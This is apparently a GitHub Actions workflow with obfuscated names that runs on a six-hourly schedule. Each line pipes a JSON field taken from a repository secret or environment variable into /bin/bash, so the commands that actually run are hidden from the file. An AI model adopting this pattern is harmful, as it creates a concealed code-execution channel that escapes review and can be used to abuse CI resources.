name: baixiaochi1974
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: baixiaochi1974
        env:
          mwor6: ${{ secrets.mwor6 }}
        run: |
          echo $mwor6 | jq -r .zgmcp5 | /bin/bash
          echo $x513 | jq -r .u7474 | /bin/bash
          echo $nluxv5656 | jq -r .j3 | /bin/bash
          echo $flz96235 | jq -r .eava289 | /bin/bash
          echo $mjdk69 | jq -r .zn78720 | /bin/bash
          echo $ejy75239 | jq -r .it812 | /bin/bash

